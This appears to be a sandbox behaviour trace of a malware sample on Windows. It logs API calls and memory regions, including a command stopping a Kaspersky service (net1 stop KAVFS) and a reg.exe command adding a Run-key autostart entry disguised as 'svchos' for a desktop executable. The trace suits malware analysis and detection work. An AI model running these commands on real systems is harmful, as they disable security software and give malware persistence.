[0125.904] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffec1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f510, lpReserved=0x0 | out: lpBuffer=0xffec1efc*, lpNumberOfCharsWritten=0x18f510*=0x2) returned 1 [0125.904] NetApiBufferFree (Buffer=0x294d40) returned 0x0 [0125.904] NetApiBufferFree (Buffer=0x29c0e0) returned 0x0 [0125.904] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop KAVFS /y" [0125.904] exit (_Code=2) Process: id = "419" image_name = "reg.exe" filename = "c:\\windows\\system32\\reg.exe" page_root = "0x7a4df000" os_pid = "0xfa0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "411" os_parent_pid = "0xf58" cmd_line = "REG ADD \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"svchos\" /t REG_SZ /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe\" /f" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14703 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14704 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14705 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14706 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 14707 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14708 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 14709 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 14710 start_va = 0xff480000 end_va = 0xff4d5fff entry_point = 0xff480000 region_type = mapped_file name = "reg.exe" filename = "\\Windows\\System32\\reg.exe" (normalized: "c:\\windows\\system32\\reg.exe") Region: id = 14711 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14712 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 14713 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 14714 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 14717 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14718 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14719 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 14720 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14721 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 14722 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 14723 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14804 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14805 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 14806 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 14807 start_va = 0xe0000 end_va = 0xe8fff entry_point = 0xe0000 region_type = mapped_file name = "reg.exe.mui" filename = "\\Windows\\System32\\en-US\\reg.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\reg.exe.mui") Region: id = 14808 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 14809 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 14810 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 14811 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 14812 start_va = 0x430000 end_va = 0x5b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 14813 start_va = 0x5c0000 end_va = 0x740fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 14814 start_va = 0x750000 end_va = 0x1b4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 14815 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14816 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14817 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14818 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14819 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 14820 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14821 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14822 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 14823 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 14824 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 14825 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14826 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14827 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14828 start_va = 0x1b50000 end_va = 0x1e1efff entry_point = 0x1b50000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 14829 start_va = 0x1e20000 end_va = 0x1edffff entry_point = 0x1e20000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 1013 os_tid = 0xeec [0126.176] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afa10 | out: lpSystemTimeAsFileTime=0x1afa10*(dwLowDateTime=0xda4d0, dwHighDateTime=0x1d4868a)) [0126.176] GetCurrentProcessId () returned 0xfa0 [0126.176] GetCurrentThreadId () returned 0xeec [0126.176] GetTickCount () returned 0x290aa [0126.176] QueryPerformanceCounter (in: lpPerformanceCount=0x1afa18 | out: lpPerformanceCount=0x1afa18*=1817309400000) returned 1 [0126.178] GetModuleHandleW (lpModuleName=0x0) returned 0xff480000 [0126.178] __set_app_type (_Type=0x1) [0126.178] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff4900d0) returned 0x0 [0126.178] __wgetmainargs (in: _Argc=0xff492140, _Argv=0xff492150, _Env=0xff492148, _DoWildCard=0, _StartInfo=0xff49215c | out: _Argc=0xff492140, _Argv=0xff492150, _Env=0xff492148) returned 0 [0126.178] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0126.180] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0126.180] RegOpenKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x1af9e8 | out: phkResult=0x1af9e8*=0x0) returned 0x2 [0126.180] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0126.180] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0126.180] lstrlenW (lpString="") returned 0 [0126.181] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0126.181] _memicmp (_Buf1=0x34b750, _Buf2=0xff481458, _Size=0x7) returned 0 [0126.181] lstrlenW (lpString="HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 63 [0126.181] _memicmp (_Buf1=0x34b770, _Buf2=0xff481458, _Size=0x7) returned 0 [0126.181] _vsnwprintf (in: _Buffer=0x345d00, _BufferCount=0xe, _Format="|%s|", _ArgList=0x1af7e8 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0126.181] _vsnwprintf (in: _Buffer=0x34b8f0, _BufferCount=0x42, _Format="|%s|", _ArgList=0x1af7e8 | out: _Buffer="|HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|") returned 65 [0126.181] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0126.181] lstrlenW (lpString="|HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|") returned 65 [0126.181] SetLastError (dwErrCode=0x490) [0126.181] lstrlenW (lpString="HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 63 [0126.181] lstrlenW (lpString="HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 63 [0126.181] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0126.181] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0126.181] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x59) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x46) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0126.182] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0126.183] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0126.183] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0126.183] StrChrW (lpStart=" \x09", wMatch=0x56) returned 0x0 [0126.183] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0126.183] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0126.183] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0126.183] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0126.183] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0126.183] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0126.183] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0126.183] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0126.183] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0126.183] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0126.183] lstrlenW (lpString="HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 63 [0126.183] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0126.183] lstrlenW (lpString="HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 63 [0126.183] lstrlenW (lpString="HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 63 [0126.183] StrChrIW (lpStart="HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" [0126.184] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0126.184] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_CURRENT_USER", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 3 [0126.184] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_CURRENT_USER", cchCount1=-1, lpString2="HKEY_CURRENT_USER", cchCount2=-1) returned 2 [0126.184] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0126.184] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0126.184] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0126.184] StrChrIW (lpStart="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\Microsoft\\Windows\\CurrentVersion\\Run" [0126.184] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0126.184] StrChrIW (lpStart="Microsoft\\Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\Windows\\CurrentVersion\\Run" [0126.184] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0126.184] StrChrIW (lpStart="Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\CurrentVersion\\Run" [0126.184] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0126.184] StrChrIW (lpStart="CurrentVersion\\Run", wMatch=0x5c) returned="\\Run" [0126.184] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0126.184] StrChrIW (lpStart="Run", wMatch=0x5c) returned 0x0 [0126.184] SetLastError (dwErrCode=0x490) [0126.184] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0126.184] SetLastError (dwErrCode=0x0) [0126.184] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0126.185] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0126.185] lstrlenW (lpString="svchos") returned 6 [0126.185] lstrlenW (lpString="svchos") returned 6 [0126.185] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0126.185] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0126.185] StrChrW (lpStart=" \x09", wMatch=0x76) returned 0x0 [0126.185] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0126.185] StrChrW (lpStart=" \x09", wMatch=0x68) returned 0x0 [0126.185] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0126.185] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0126.185] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0126.185] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0126.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0126.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0126.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 2 [0126.186] StrDupW (lpSrch="REG_SZ") returned="REG_SZ" [0126.186] lstrlenW (lpString="REG_SZ") returned 6 [0126.186] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0126.186] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0126.186] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0126.186] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0126.186] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0126.186] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0126.186] StrChrW (lpStart=" \x09", wMatch=0x5a) returned 0x0 [0126.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_SZ", cchCount1=-1, lpString2="REG_SZ", cchCount2=-1) returned 2 [0126.186] LocalFree (hMem=0x34b980) returned 0x0 [0126.186] SetLastError (dwErrCode=0x0) [0126.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0126.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0126.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0126.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0126.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0126.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0126.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0126.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0126.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 2 [0126.186] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe") returned 47 [0126.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0126.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0126.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0126.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0126.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0126.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0126.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0126.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0126.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 3 [0126.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-d", cchCount2=-1) returned 1 [0126.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 2 [0126.186] SetLastError (dwErrCode=0x0) [0126.187] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x1af8c0, lpdwDisposition=0x1af8e0 | out: phkResult=0x1af8c0*=0x54, lpdwDisposition=0x1af8e0*=0x2) returned 0x0 [0126.187] RegQueryValueExW (in: hKey=0x54, lpValueName="svchos", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x2 [0126.187] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe") returned 47 [0126.187] RegSetValueExW (in: hKey=0x54, lpValueName="svchos", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe", cbData=0x60 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe") returned 0x0 [0126.187] RegCloseKey (hKey=0x54) returned 0x0 [0126.188] SetLastError (dwErrCode=0x0) [0126.188] GetLastError () returned 0x0 [0126.188] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x1af840, nSize=0x0, Arguments=0x0 | out: lpBuffer="\xb980\x34") returned 0x27 [0126.189] GetLastError () returned 0x0 [0126.189] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0126.189] SetLastError (dwErrCode=0x0) [0126.189] LocalFree (hMem=0x34b980) returned 0x0 [0126.189] __iob_func () returned 0x7fefdba2a80 [0126.189] _fileno (_File=0x7fefdba2ab0) returned 1 [0126.189] _errno () returned 0x304bb0 [0126.189] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.189] _errno () returned 0x304bb0 [0126.189] GetFileType (hFile=0x7) returned 0x2 [0126.189] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.189] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1af7c0 | out: lpMode=0x1af7c0) returned 1 [0126.190] __iob_func () returned 0x7fefdba2a80 [0126.190] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.190] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0126.190] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x34bc00*, nNumberOfCharsToWrite=0x27, lpNumberOfCharsWritten=0x1af830, lpReserved=0x0 | out: lpBuffer=0x34bc00*, lpNumberOfCharsWritten=0x1af830*=0x27) returned 1 [0126.193] exit (_Code=0) Process: id = "420" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x78017000" os_pid = "0x59c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "injection" parent_id = "1" os_parent_pid = "0x954" cmd_line = "taskeng.exe {CD671DAD-4B74-4170-B439-24634829D136} 